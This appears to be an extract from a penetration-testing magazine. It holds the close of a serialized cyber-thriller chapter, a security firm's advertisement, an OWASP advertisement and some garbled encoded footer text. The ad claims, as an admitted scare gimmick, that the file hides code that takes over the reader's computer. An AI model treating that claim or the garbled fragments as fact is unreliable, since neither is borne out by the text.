“Who are you supposed to be?” he asked. “A refugee from a Charlie Chan movie?”

But when she admitted her fears about being seen, he softened.

“Here,” he said, opening one of her suitcases. “Let’s see if we can do something about that look.” He found her makeup kit and opened it, over her protest.

“Relax,” he said. “You forget I was in the field for years as part of my CIA career. I had to learn a few tricks to keep from being spotted.”

He knelt in front of her and applied powders and mascara. He took her hair from the ponytail, grabbed a hair brush and restyled her. Yvonne felt the gentleness of his hands as he worked; his touch was soft, the way she remembered.

When he was done and she looked in the mirror, she saw a completely different woman – a tourist from America, somewhere in the Midwest – not exactly a look she’d ever thought of achieving, but a far cry from the Uygur province.

“I’d still go with the sunglasses, though,” he said. “Just to be sure.”

“You should do something about your appearance, too,” she said.

“Very funny.”

“I’m serious. Shi must know who you are. It would be quite a coup for him to have you in custody.”

He reached into his jacket pocket and pulled out a fake mustache. It was more of a small caterpillar placed between the nose and upper lip, an Inspector Clouseau getup that made Yvonne laugh as he adjusted the corners. Stokes wasn’t so bad after all. If only he hadn’t been married.

She reached to grab her bags for the ferry trip, but Stokes beat her to it. “Can’t let you hurt those magic hands,” he said as he headed for the elevator. “Those fingers may just save us from the next cyber attack.” u

END Chapter Six

By Mike Brennan and Richard Stiennon

You can buy the paperback version of Cyber Styletto, which includes black and white sketches of the characters, by clicking on LuLu.Com

http://www.lulu.com/browse/search.php?fListingClass=0&fSearch=Cyber+Styletto

In the upcoming issue of the

If you would like to contact PenTest team, just send an email to [email protected] or [email protected] . We will reply a.s.a.p.

PenTest Magazine has a rights to change the content of the next Magazine Edition.

Web Application Devices

Available to download on June 22th

www.p2sol.com securityservices @ p2sol dot com

:

Apologies for the above marketing gimmick, but it was necessary to grab your attention. We could tell you that we offer superior information security services followed by a highly biased list of reasons, quotes of industry sources, and facts to support our assertions. However, we both know that you know that game, so let’s change the rules and let the truth in our advertisement speak for our work, and maybe you’ll give us the opportunity to let our work speak instead. For the same reasons that clever marketing can sell an inferior product; your entire network can be hacked, starting with one little email. Interested, or shall you skip to the next page?

As a proof in concept, the soft copy version of this document contains custom embedded software control codes designed to gain control over your computer, then masquerading as you, manipulate stock prices using information contained on your system. Buy buy! Sell Sell!. Sound farfetched? Maybe 5 years ago, but that is today’s new paradigm. Forgive the fear tactics, but the point is that skillful social manipulation in conjunction with “embedded software control codes” are the methods used by malicious parties to compromise (gain control of) modern networks. This challenge can only be met with intelligence.

We combine software engineering, security know how, and data analysis to offer real world peer based metrics of your security issues as well as deep dive technical assessments ranging from penetration / technical assessments to strategic reviews.

Contact: Shohn Trojacek - [email protected] 120 N. MAIN BRYAN, TX 77803 Tel 939.393.9081

Security Services

$50,000 Firewall ruined by a lack of cents!

A UDI T S U P P O R TStrategic and Technical assessments for audit firms, audit, and IT departments:

• Penetration Testing • Security Assessments • Disaster Recovery • Special Projects

PE E R B A SE D E VA LU A TI O N

Ongoing comparison against peers of key IT security metrics and controls. Periodic reporting of key metrics.

S TA TI S TI C A L PE N E TR A TI O N

Periodic rotation of professional penetration testers against your network via a custom portal complete with the ability to limit the scope and depth of testing according to client needs.

U SE R E D UC A TI O N

Custom security training exercises for your organizationincluding use of penetration tests as a way of providing users an unforgettable experience.

S E R V I C E S A V A I L A B L E • $250,000 Intrusion Detection System • $50,000 Redundant Firewalls • $300,000 Salaries for IT Security Personnel • $400,000 Gee Whiz Computer Defense Shield

Hacked because someone used password123 as a “temporary” password…….

Sleep better with our D3tangler™ technology!

Our new patent pending D3tangler technology helps you win the evolving game of IT security. The technology solves all your security problems by pressing a button! Don’t be fooled by cheap competitor’s products!

http://www.p2sol.com

• �� Checklists, tools & guidance

•�� Local chapters

• �� builders, breakers and defenders

• �� and more..

��

��“We help protect critical infrastructure one byte at a time”

http://www.owasp.org

46#4$3*#&/08 /&95*446&065400/ · web app bypassing web antiviruses by eugene dokukin...

Documents

46#4$3#&/08 /&95446&065400/ · web app bypassing web antiviruses by eugene dokukin...